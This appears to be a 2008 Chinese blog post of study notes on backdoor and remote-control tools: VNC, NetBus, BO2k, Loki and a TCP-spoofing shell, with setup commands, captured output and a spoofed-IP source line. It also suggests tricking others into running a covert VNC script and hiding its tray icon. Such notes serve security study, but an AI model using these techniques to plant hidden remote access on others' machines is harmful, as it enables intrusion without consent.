分类: 网络与安全
2008-05-30 10:55:34
本章中的多数工具有过久的嫌疑,还需要及时跟踪相关网站。
由AT&T实验室开发,。由服务器和客户端组成,同时VNC还有web server的方式。
多数杀毒软件把VNC当作正常软件。
Windows中VNC web server的默认端口5800,VNC 5900.如果设置为1,则对应5801和5901端口。访问举例:。4.1版本中可以让本地用户选择是否允许远程接入,访问控制也可以基于IP或一个网段。收费版本还支持windows域的集成。
密码设置如下:
[HKEY_CURRENT_USER\Software\RealVNC\WinVNC4]
"Password"=hex:15,
命令行下添加:
C:\>reg export HKCU\Software\RealVNC\WinVNC4 vnc.txt
The operation completed successfully.
C:\>type vnc.txt
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\RealVNC\WinVNC4]
"Password"=hex:15,
你可以写个脚本,然后勾引它人执行。脚本见教材中的图片。另外还可以通过修改源码方式去掉桌面右下角显示的图标。
Unix下面更简单,任何用户都可以执行。不过非root用户不能使用80端口等1024以下的端口。
比如:
# /usr/X11R6/bin/vncserver
You will require a password to
access your desktops.
Password:
Verify:
Would you like to enter a
view-only password (y/n)? n
xauth: creating new authority file /root/.Xauthority
New 'X' desktop is KGS-87-14:2
Creating default startup script
/root/.vnc/xstartup
Starting applications specified
in /root/.vnc/xstartup
Log file is
/root/.vnc/KGS-87-14:2.log
通过netstat可以看到监听端口是5802,可以这样访问:
# netstat -anp | grep -i vnc
tcp 0
0
tcp 0
0
tcp 0
0
tcp 0
0 :::6002
:::* LISTEN 20682/Xvnc
unix 2
[ ACC ] STREAM LISTENING 32713
20682/Xvnc
/tmp/.X11-unix/X2
unix 3
[ ] STREAM CONNECTED 32734
20682/Xvnc
/tmp/.X11-unix/X2
unix 3
[ ] STREAM CONNECTED 32732
20682/Xvnc
/tmp/.X11-unix/X2
NETBUS的图形不如VNC友好,主要针对黑客应用。很多杀毒软件不允许它存在。它也很难高效率的使用。在很多安全网站都有下载,比如:http://www.packetstormsecurity.org。这里不做详细介绍,参见教材。
Back Orifice 2000 (BO2k)是Netbus的下一代后门访问工具,不过这个工具依然被多数杀毒软件拒绝。
可以在以下地址下载:
http://www.packetstormsecurity.com
and http://www.securityfocus.com.
最新版本:可以在找到。
在windows 2003上面运行好像有一定的问题,这里不详细介绍,参见教材。
教程参见:
它的fingerprint呈现乱象,能越过一些杀毒软件。远程控制功能和Netbus and BO2k类似。下载地址:http://www.packetstormsecurity.org,等。俺是从这里下载的:。
工具的主页地址:
Loki利用icmp,下载:http://www.packetstormsecurity.org
特征:出现较大的ICMP包,使用固定的ICMP sequence number和ICMP Ping reply。
以下部分略
利用TCP欺骗
# gcc -o stcpshell stcpshell.c
比如在服务器端执行:./stcpshell –s
客户端执行:./stcpshell -c -si
抓包的结果:
# tcpdump | grep 207.46.
tcpdump: verbose output
suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type
EN10MB (Ethernet), capture size 96 bytes
10:50:11.267702 IP
207.46.131.137.1234 >
10:50:11.270461 IP
207.46.131.137.rwhois >
10:50:11.270472 IP
207.46.131.137.rwhois >
10:50:11.270482 IP
207.46.131.137.rwhois >
10:50:11.270491 IP
207.46.131.137.rwhois >
10:50:11.270501 IP
207.46.131.137.rwhois >
10:50:11.270511 IP
207.46.131.137.rwhois >
10:50:11.270523 IP
207.46.131.137.rwhois >
10:50:11.270535 IP
207.46.131.137.rwhois >
10:50:11.270544 IP
207.46.131.137.rwhois >
10:50:11.270553 IP
207.46.131.137.rwhois >
10:50:11.270565 IP
207.46.131.137.rwhois >
10:50:11.270574 IP
207.46.131.137.rwhois >
10:50:11.270586 IP
207.46.131.137.rwhois >
10:50:11.270594 IP 207.46.131.137.rwhois
>
10:50:11.270602 IP
207.46.131.137.rwhois >
10:50:11.270612 IP
207.46.131.137.rwhois >
10:50:11.270621 IP
207.46.131.137.rwhois >
10:50:11.270631 IP
207.46.131.137.rwhois >
10:50:11.270640 IP
207.46.131.137.rwhois >
10:50:11.270648 IP
207.46.131.137.rwhois >
10:50:11.270667 IP
207.46.131.137.rwhois >
10:50:11.270676 IP
207.46.131.137.rwhois >
10:50:11.270687 IP
207.46.131.137.rwhois >
10:50:11.270695 IP
207.46.131.137.rwhois >
10:50:11.270722 IP
207.46.131.137.rwhois >
可以修改伪造的IP:
/* from .. you BETTER change this */
pkt.ip.ip_src.s_addr=inet_addr("207.46.131.137");
本工具只针对linux 2.2的内核,略